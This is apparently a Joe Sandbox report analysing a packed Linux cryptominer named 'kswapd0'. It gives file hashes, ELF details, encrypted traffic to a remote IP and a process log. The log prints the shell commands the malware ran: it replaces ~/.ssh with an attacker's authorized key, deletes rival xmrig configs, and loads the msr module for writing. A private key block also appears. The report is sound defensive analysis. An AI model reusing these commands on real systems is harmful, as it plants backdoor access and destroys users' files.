Preview:	-----BEGIN PRIVATE KEY-----.MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQD8xxw98HvQb6TN.VNs9cKmazQjztJZ+uk+/E4XPTi0ecWwx3a5IOraEmUbhuom1Nc1UHcOUrLPk1DCX.BiXsdtHhikBIZxRjHrpAEcD40XZuKb9ZXVwS+9nnZ8cWEW7fvmYFhuDfnokrl1Pu.d3bVBrmI6n0XEmM1tNuqNd+0YoZTLY/mr8z9rGPEEbcKdDhhO45EdKe37rDxTC8e.t+o4pb1hewP8/s8/BK/BLQXNfwouWSuA3s2Erhkem886ujJUJd+s/WxYzciUphnC.9u9rLIkf5zOZiAXddvxrYU1mqVe5QAjb+uiiMNkpkjIdUFJ8Y5w7fpF0PWkTlWqq.Z222QG3TAgMBAAECggEAF5btR8p9g4InuxHENAOjkFK6FyQvNzxj3M0Rm7sL8t9a.3Xx2mz7/cXhsaPxjhYmz07nDWsiTMTOsJSvpthuQkp+4SAl2mZlwgDIn9BB4IOe8.d7aCtTLTrwi8R47w7ehy1Ok1ayj8XBkPOB3l9RNflSts6Q5KO+TY6xWD/u2C45gZ.bvl/003yeCrV1sxMh46jhOPdJEe4bnQJcLXy+PDLVBQeBEAdIULpU/3mpTLeY1HY.U/I8ngt5bCAfae1+eX34E5v13EHeZqXErnEKHjehXoOFv7Pd/+/gsZvTJoXGfpFN.6bvtgUt7BoSvu33/xWizOgoZOCXLeplAaNS7kIXnYQKBgQD/BlbWQ1YiOVHza4pm.pB+7eA6/XDCkYGV6ccM3m4ibfv3PUC+DPWhzyp+L+jCF1mzdSso0LpDy6J6AK9Sb.+lDQrVbuJg87sf59cOMBlV6Hi5v/HhdlbnV6IXJSKf2Q7YJq/2B1E8s+LQxkK9aR.tq8QUsAIvO81h7FC81sXB6AV5QKBgQD9vpJGZAlU4BVnd096LdLc3Sq4TM4XsV

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.946128125291084
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	kswapd0
File size:	2'225'356 bytes
MD5:	92ebbacccf23ef998d99635a2b670e43
SHA1:	55af994c3d877c68d35df2873d2b88f58c22e11d
SHA256:	56edefa58b141d1c8dc88b235629b0cce6e47d61a21b0bc24289dd9cc9227fa2
SHA512:	8deb0952d0061dc55d728a6923e4f7e12b6ca670800070e604cb6ac996391eb31738b39938400b985cf9187a7a0320827d27da43810b09cf958a44a633069b3e
SSDEEP:	49152:7NcjlR90c88OeWSUiyLspBFLKb52pzTduYRpKHcVUgcgl:xWPQheWvi9TKV29Tdo8VUgJl
TLSH:	0CA533B0B04DE7B3A347BB6DA776A1A02C9E12201FCFA8A5D55C3C12FE781E54653136
File Content Preview:	.ELF..............>.....H.a.....@...................@.8...@.......................@.......@.......!.......!...............................b.......b.............x.D.............Q.td....................................................6;..UPX!l........F]..F]

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x61e948
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	64
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x21f2a5	0x21f2a5	7.9462	0x5	R E	0x1000
LOAD	0x0	0x620000	0x620000	0x0	0x44d078	0.0000	0x6	RW	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x10

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2023 05:39:44.454972029 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:44.759388924 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:44.759665966 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:44.760174990 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:45.064629078 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:45.078490973 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:45.078556061 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:45.078922987 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:45.078922987 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:45.097338915 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:45.414565086 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:45.415395975 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:39:45.719887972 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:39:45.759593010 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:40:45.719552994 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:40:46.024297953 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:40:46.470103979 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:40:46.774687052 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:40:46.774900913 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:41:34.994158983 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:41:35.298751116 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:41:35.298871040 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:42:06.782044888 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:42:07.086853027 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:42:07.087122917 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:43:07.175693035 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:43:07.480571985 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:43:07.607974052 CEST	50188	80	192.168.2.20	179.43.139.82
Sep 22, 2023 05:43:07.913011074 CEST	80	50188	179.43.139.82	192.168.2.20
Sep 22, 2023 05:43:07.913373947 CEST	50188	80	192.168.2.20	179.43.139.82

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	50188	179.43.139.82	80

Timestamp	kBytes transferred	Direction	Data
Sep 22, 2023 05:39:44.760174990 CEST	0	OUT	Data Raw: 16 03 01 01 20 01 00 01 1c 03 03 44 23 b1 c3 6a d6 9b 64 27 93 1a 92 41 3c 53 ee 8c fa c4 b6 83 e0 ab c3 3c 8e 51 33 c3 56 c5 7e 20 ae 47 82 97 5c 00 99 cb a6 97 ee 2e 7a 50 50 6b cf ee 4f 13 28 12 7d ae 65 59 c4 77 7a 6d eb a3 00 3e 13 02 13 03 Data Ascii: D#jd'A<S<Q3V~ G\.zPPkO(}eYwzm>,0+/$(k#'g93=<5/#0.+
Sep 22, 2023 05:39:45.078490973 CEST	1	IN	Data Raw: 16 03 03 00 35 02 00 00 31 03 03 0c 1e 29 5d a6 1f a1 de 73 91 4a 63 57 66 2c 90 f9 06 d2 d0 a2 5b 89 1b 13 d7 7d f5 05 b4 27 15 00 00 9f 00 00 09 ff 01 00 01 00 00 23 00 00 16 03 03 02 aa 0b 00 02 a6 00 02 a3 00 02 a0 30 82 02 9c 30 82 01 84 02 Data Ascii: 51)]sJcWf,[}'#000H010Ulocalhost0230902111514Z330830111514Z010Ulocalhost0"0H0vIe$5hEP(TY2'V3
Sep 22, 2023 05:39:45.078556061 CEST	2	IN	Data Raw: 01 01 00 13 74 27 89 61 ae 14 00 0f 36 af d8 ed 90 30 1d e7 1c f1 af 2d ac af 80 1c 57 14 9d 69 ab 16 9d f9 8a 61 e6 1f 6a ca 42 21 c3 6b e7 15 8c 59 84 84 40 08 74 cf 8d 6f 6d bc b5 8a 64 78 26 e9 a2 23 a7 75 ab 13 a4 68 d3 67 f6 a8 78 9a 5c dd Data Ascii: t'a60-WiajB!kY@tomdx&#uhgx\K$LdvT)b^\8r)#<P\a+EIQ[yNwcAH(Eg~+]Htlx\|.CFb4y!P\>:Kh&7pL{v
Sep 22, 2023 05:39:45.097338915 CEST	2	OUT	Data Raw: 16 03 03 01 06 10 00 01 02 01 00 30 01 f8 76 fe 81 9b b9 6a bf 1f 29 36 df 04 ec 9d e6 38 dd ee ac a4 65 fb 24 4b 75 9d 64 45 5d a0 0f 65 ed f1 74 d0 3b 53 75 8a 97 84 02 5a a4 a0 29 d0 5a f3 ea b9 0e f2 1e 9a 1f 01 e3 56 31 3a 7e 51 9e ae 31 a4 Data Ascii: 0vj)68e$KudE]et;SuZ)ZV1:~Q1-RX}=7U8M]MFR$djCq)Pr5kApLuq)a????C `wcLOkRSSe7G~_0O7EA?=dP
Sep 22, 2023 05:39:45.414565086 CEST	3	IN	Data Raw: 16 03 03 00 aa 04 00 00 a6 00 00 01 2c 00 a0 e0 53 99 c9 59 ed 6a 73 0d 47 58 df d7 bb 46 2b 3d 34 72 e7 ae 14 b7 55 e3 3f 2f 91 19 39 a5 85 43 9b 6c c8 af c5 de 72 89 33 92 63 a4 c3 14 e2 31 6d 53 e3 32 5c eb 94 11 3f 05 c4 19 da 97 96 3e b7 92 Data Ascii: ,SYjsGXF+=4rU?/9Clr3c1mS2\?>H\|ReS$L]#-Krc<=8R\| vhA=!k.>>(<$WkW{8jW\|X-s&9
Sep 22, 2023 05:39:45.415395975 CEST	3	OUT	Data Raw: 17 03 03 01 e0 8c fa 60 a5 f3 d9 9d 62 fa 3f 6c 0b 78 59 04 06 ed 18 3c 34 88 4f 73 6f c2 3a 59 5f ee 7f 3d 1c 92 4a ba 14 08 da f4 10 e9 b8 0e 1a df 28 a4 25 0e f4 dc 8c 23 e3 d0 4b de a0 ef 3b 70 72 0e 34 e9 b4 97 7d 74 a1 e7 9d 08 3e 5c 9a 92 Data Ascii: `b?lxY<4Oso:Y_=J(%#K;pr4}t>\s=nEzJon^10?i]r7N2sX3`di:y'_WWq"1iAm9k98]z$r8<qVT3N$;Q>'
Sep 22, 2023 05:39:45.719887972 CEST	4	IN	Data Raw: 17 03 03 02 1a fc 99 3c 0b 1c 24 16 58 f7 36 1d 39 78 1e 5c e6 9f 71 a5 55 e2 e5 b1 9d 77 0b b4 5e dd fc 52 44 58 de 1b 3e 50 89 f5 d8 82 ba 18 08 cd b8 8c ab 91 db b4 3e 03 e3 a2 a7 f6 98 d4 f7 df 06 0d 5d 0f 61 c6 b1 9a 0f 8f 1d a0 a1 ef 9d ce Data Ascii: <$X69x\qUw^RDX>P>]a{O8>hI+(R[o@G@vz5HMkA5y2v+4d1zH)F\|aIunhG6XGO#Q_Glqc+
Sep 22, 2023 05:40:46.470103979 CEST	4	OUT	Data Raw: 17 03 03 00 6a 8c fa 60 a5 f3 d9 9d 63 77 48 26 a8 25 54 cf 2b f9 f1 dc 70 70 ad 36 95 31 a7 3d c5 5e 03 6d 58 3c 22 13 a6 f4 22 51 cd 7e ef d0 8e 74 89 7e 5c 3e f6 47 8f ad ba 9a 77 dd 88 2f 2a 1d 71 ed da fb 78 a9 21 04 58 35 db 18 e3 68 dc 58 Data Ascii: j`cwH&%T+pp61=^mX<""Q~t~\>Gw/*qx!X5hXm!l-QJYE%dWAfn9<{~\
Sep 22, 2023 05:40:46.774687052 CEST	4	IN	Data Raw: 17 03 03 00 5f fc 99 3c 0b 1c 24 16 59 9e 93 42 bb 62 97 e2 9d 9b 64 a2 bc c1 77 4f b8 97 07 33 db 4d 46 a5 9a 65 29 16 d4 94 22 87 3e e7 ce 51 84 94 62 9d 68 c2 b6 0f 42 8f d2 e2 c6 3a 12 d1 15 52 1d 40 99 f7 60 9d 94 aa 83 90 ed 6f d4 2a 9c 7c Data Ascii: _<$YBbdwO3MFe)">QbhB:R@`o*\|B0,s
Sep 22, 2023 05:41:34.994158983 CEST	5	OUT	Data Raw: 17 03 03 00 e7 8c fa 60 a5 f3 d9 9d 64 9e 54 9b 12 cd f1 a7 75 17 ff 0e 70 71 9b 82 3b 44 75 6a 98 68 77 34 58 c0 b5 be 30 3e b0 47 22 b2 fe 70 ea c0 05 27 77 f0 c4 ae 57 3a 23 00 01 5f e1 f9 b9 82 4a e3 fe f6 1f 53 89 f5 a3 a5 3f 74 b0 24 59 36 Data Ascii: `dTupq;Dujhw4X0>G"p'wW:#_JS?t$Y6>A XqI1eZnJ,f^E-B-)C!L3Lk]Vo\BP44(R~At=:wWqZ0V5ZBV?WHr:+
Sep 22, 2023 05:41:35.298751116 CEST	5	IN	Data Raw: 17 03 03 00 57 fc 99 3c 0b 1c 24 16 5a ee ab 4a 5c 74 8a 8c 49 2b 51 45 42 4e d5 6d 90 0b 96 4c 8e 04 a9 8e 4d be 0d ef d6 4e 00 5c 83 ac d9 75 1a 69 b9 95 bb 49 57 18 98 4b 62 d2 f9 c0 b3 55 0f 48 2e 11 9e 0d 62 6f 6d 7f 88 e3 66 48 b6 3c e2 2b Data Ascii: W<$ZJ\tI+QEBNmLMN\uiIWKbUH.bomfH<+6KGi{
Sep 22, 2023 05:42:06.782044888 CEST	5	OUT	Data Raw: 17 03 03 00 e7 8c fa 60 a5 f3 d9 9d 65 ec 8e 0c c3 71 0b b4 6e 16 27 19 f4 77 e6 da df c4 53 9f 96 62 c7 e3 32 df 0d ea f1 93 6d 7e 79 e2 b4 cb c5 85 25 a7 b3 2f 63 81 90 72 22 a3 ca cb a2 dd 3a d3 c1 c6 2a 68 c4 02 a5 11 77 95 75 fe be 37 5c bf Data Ascii: `eqn'wSb2m~y%/cr":hwu7\a?=IJZviKgbJc"(,u8Aih@:$"#`5W<<Cnphv}]mk /=F5Ui9
Sep 22, 2023 05:42:07.086853027 CEST	5	IN	Data Raw: 17 03 03 00 57 fc 99 3c 0b 1c 24 16 5b 18 17 b3 26 6e d0 13 c9 28 a9 f0 9f be 25 2c 9d 43 b5 82 05 9a 21 97 62 30 56 2b ae ca b6 4e ce cd b1 ec a0 41 e5 83 be 82 ba 94 d2 20 80 59 01 9d 18 65 4f 33 b1 cd 43 5f df a6 63 31 01 05 f4 0f c8 b0 f4 b0 Data Ascii: W<$[&n(%,C!b0V+NA YeO3C_c1$X+,h
Sep 22, 2023 05:43:07.607974052 CEST	6	OUT	Data Raw: 17 03 03 00 6a 8c fa 60 a5 f3 d9 9d 66 7f 3c e1 a7 cd bb b7 a3 7a c1 8b 36 cb 8f 9a ec a5 17 77 24 1d 25 bd 61 2a f7 e0 7c 7b 6a 52 26 cc 93 22 88 8e f0 27 29 7c 1a e6 77 36 ff eb f4 4f 7b 58 62 b8 6f a1 44 05 ba 45 f2 e7 9d 39 3b 81 e1 45 f0 e1 Data Ascii: j`f<z6w$%a*\|{jR&"')\|w6O{XboDE9;Ew284Z8A\|G}s?6
Sep 22, 2023 05:43:07.913011074 CEST	6	IN	Data Raw: 17 03 03 00 5f fc 99 3c 0b 1c 24 16 5c fc ca a2 7e 03 fd 3f 2a aa 3c 0a b0 4d d3 cd 01 d2 b4 e5 02 b4 93 03 86 6f 12 59 0c 3a ea 20 f4 2e df 65 ff bc f3 ce 8d 3b 9e d4 2c 47 99 79 dd 0a da 8c 6c 37 1b 6f 01 61 1c ce f9 7e 2c dc d8 7b 61 53 06 fb Data Ascii: _<$\~?*<MoY: .e;,Gyl7oa~,{aS 09AT9VjMl

System Behavior

Analysis Process: kswapd0 PID: 4697, Parent PID: 4629

General

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/tmp/kswapd0
Arguments:	/tmp/kswapd0
File size:	2225356 bytes
MD5 hash:	92ebbacccf23ef998d99635a2b670e43

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/tmp/kswapd0
Arguments:	-
File size:	2225356 bytes
MD5 hash:	92ebbacccf23ef998d99635a2b670e43

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/rm
Arguments:	rm -rf .ssh
File size:	60272 bytes
MD5 hash:	b79876063d894c449856cca508ecca7f

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/mkdir
Arguments:	mkdir .ssh
File size:	76848 bytes
MD5 hash:	a97f666f21c85ec62ea47d022263ef41

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/chmod
Arguments:	chmod -R go= /home/james/.ssh
File size:	56112 bytes
MD5 hash:	32c8c7318223ebc5b934a78cfc153d6f

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/tmp/kswapd0
Arguments:	-
File size:	2225356 bytes
MD5 hash:	92ebbacccf23ef998d99635a2b670e43

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/usr/bin/chattr
Arguments:	chattr -ia /home/james/.xmrig.json
File size:	10592 bytes
MD5 hash:	8aa970e89963faf71434e3a37222cc49

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/rm
Arguments:	rm -rf /home/james/.xmrig.json
File size:	60272 bytes
MD5 hash:	b79876063d894c449856cca508ecca7f

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/usr/bin/chattr
Arguments:	chattr -ia /home/james/.config/xmrig.json
File size:	10592 bytes
MD5 hash:	8aa970e89963faf71434e3a37222cc49

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/bin/rm
Arguments:	rm -rf /home/james/.config/xmrig.json
File size:	60272 bytes
MD5 hash:	b79876063d894c449856cca508ecca7f

Start time (UTC):	03:39:43
Start date (UTC):	22/09/2023
Path:	/tmp/kswapd0
Arguments:	-
File size:	2225356 bytes
MD5 hash:	92ebbacccf23ef998d99635a2b670e43

Start time (UTC):	03:39:44
Start date (UTC):	22/09/2023
Path:	/tmp/kswapd0
Arguments:	-
File size:	2225356 bytes
MD5 hash:	92ebbacccf23ef998d99635a2b670e43

Start time (UTC):	03:39:45
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:45
Start date (UTC):	22/09/2023
Path:	/bin/sh
Arguments:	-
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Start time (UTC):	03:39:45
Start date (UTC):	22/09/2023
Path:	/sbin/modprobe
Arguments:	/sbin/modprobe msr allow_writes=on
File size:	9 bytes
MD5 hash:	45c119a51c0bd3f057393c8ac51d00be

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report kswapd0

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/home/james/.ssh/authorized_keys

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages

/tmp/cert.pem

/tmp/cert_key.pem

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

TCP Packets

HTTP Packets

System Behavior

Analysis Process: kswapd0 PID: 4697, Parent PID: 4629

General

File Activities

File Opened

File Read

File Written

Directory Enumerated

Process Activities

Process Forked

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: kswapd0 PID: 4706, Parent PID: 4697

General

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 4706, Parent PID: 4697

Linux Analysis Report
kswapd0